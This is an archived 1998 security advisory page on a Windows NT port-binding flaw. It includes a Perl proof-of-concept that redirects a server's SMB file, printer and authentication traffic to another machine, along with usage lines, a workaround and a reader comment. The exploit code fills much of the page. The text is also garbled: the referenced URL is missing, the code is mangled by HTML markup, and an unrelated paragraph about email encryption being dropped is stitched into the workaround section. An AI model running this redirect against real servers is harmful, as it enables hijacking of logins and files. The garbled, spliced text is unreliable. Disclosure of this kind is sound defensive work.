SMB Redirect Program for NT

Reported February 10, 1998 by Weld Pond (weld@L0PHT.COM) on BugTraq

Systems Affected

Windows NT

Description:

This program uses the NT port binding vulnerability to redirect a machine"s SMB services to another machine. It was posted by Andrew Tridgell (tridge@SAMBA.ANU.EDU.AU) on the Common Internet File System (CIFS@DISCUSS.MICROSOFT.COM) mailing list. The full message and the thread surrounding it is available via the web at:

!/usr/bin/perl
This script demonstrates a major security problem with Windows NT4. It is based on an earlier script (paul.pl) that demonstrated a problem with a protocol change that Microsoft proposed. The change in this script takes advantage of a security hole pointed out by L0pht

What this script does is allow any unprivileged user on a NT Server to redirect the local SMB services to any other SMB server which they have an IP address for. This allows the user to redirect file, printer and authentication services to another server. This has enormous consequences for security.

This script was written by Andrew Tridgell and is being sent to the CIFS discussion list so that CIFS developers become aware of this problem. It should be noted that the L0pht announcement (which predates this script) already provided an example command using netcat to achieve the same thing so this script does not actually offer malicious hackers anything more than what has already been widely distributed. I wrote this example so that the consequences would become clear to the people who are in a position to do something about fixing the problem.

Usage:

To use this script, install perl5 then run the command:
perl redirect.pl
for example:
perl redirect.pl 192.168.2.13 192.168.2.10
This would redirect any SMB connections made to the local server (whose IP address is 192.168.2.13) to the remote server 192.168.2.10. Any browsing, file access, authentication requests or printing done to the local server by SMB clients will be redirected to the remote server.

Workaround:

There is no immediate fix to this security problem yet available. A workaround is to disable local login access to non-trusted users. This can be achieved using the User Manager For Domains. At many sites this will be an acceptable solution because NT servers are often used only for remote file and printer services and do not really need to offer the ability for users to run arbitrary programs

Further, no other information is provided to the sender. They are not informed that the message has been sent anyway unencrypted. If the recipient views the contents by using the View Message button, they are then able to reply to that original message. If they do reply, Encryption has been automatically dropped from the Options, but again, this has been done without notification to the user. Hence a conversation could carry on between the two individuals without either of them realizing that the messages were being sent unencrypted.

Fix:

A proper fix will require a patch from Microsoft. Hopefully they will either implement privileged ports or they will get the socket options correct on all their servers so such bind() tricks are not possible.

<p>use IO::Socket;<br>
   use IO::Select;</p>
<p>if ($#ARGV != 1) \{<br>
   print Usage: redirect.pl <localip><remoteip>\n;<br>
   exit 0;<br>
   \}</remoteip></localip></p>
<p>my $local = $ARGV\[0\];<br>
   my $target = $ARGV\[1\];</p>
<p>my $smbport = 139;<br>
   my $Msg;</p>
<p># this is a *SMBSERVER netbios name<br>
   my $netbname = CKFDENECFDEFFCFGEFFCCACACACACACA;</p>
<p>print setting up redirection from $local to $target ...\n;</p>
<p># Create a local socket<br>
   $sock1 = new IO::Socket::INET(LocalAddr=>$local,LocalPort=>$smbport,<br>
                              Proto=>"tcp",Listen=>5,Reuse=>1);</p>
<p>while (1) \{</p>
<p>print listening on $local\n;</p>
<p># Accept a connection<br>
   $IS = $sock1->accept() || die;</p>
<p># Open a socket to the remote host<br>
   $OS = new<br>
   IO::Socket::INET(PeerAddr=>$target,PeerPort=>$smbport,Proto=>"tcp") ||<br>
   die;</p>
<p>print connected to $target\n;</p>
<p># Create a read set for select()<br>
   $rs = new IO::Select();<br>
   $rs->add($IS,$OS);</p>
<p>$first = 1;<br>
   $finished = 0;</p>
<p>while(! $finished) \{<br>
   ($r_ready) = IO::Select->select($rs,undef,undef,undef);</p>
<p>foreach $i (@$r_ready) \{<br>
   $o = $OS if $i </p><h1><a name="_IS_br_o_IS_if_i_"> $IS;<br>
   $o = $IS if $i </a></h1> $OS;
<p>recv($i,$Msg,8192,0);<br>
   if (! length $Msg) \{<br>
   $finished = 1;<br>
   break;<br>
   \}</p>
<p>if ($first && substr($Msg,0,1) eq \x81) \{<br>
   print replacing called name\n;<br>
   $msg2 =<br>
   join("",substr($Msg,0,5),$netbname,substr($Msg,37,length($Msg)-37));<br>
   send($o,$msg2,0);<br>
   $first = 0;<br>
   \} else \{<br>
   if ($i == $OS) \{ $Msg =~ s/Paul/Oops/mg;\}<br>
   send($o,$Msg,0);<br>
        \}<br>
    \}<br>
\}</p>
<p># loop back to the top again<br>
\}
</p>

Comments:

According to David LeBlanc (dleblanc@MINDSPRING.COM),as posted to BugTraq on February 10, 1998:

One correction needs to be made here. There is no such thing as an unprivileged user on a default NT server. The only accounts which are allowed to log on locally by default are high level accounts, such as admins and server ops.

To learn more about new NT security concerns, subscribe to NTSD.

Credit:
Reported by: Weld Pond (weld@L0PHT.COM)
Posted here at NTSecurity.Net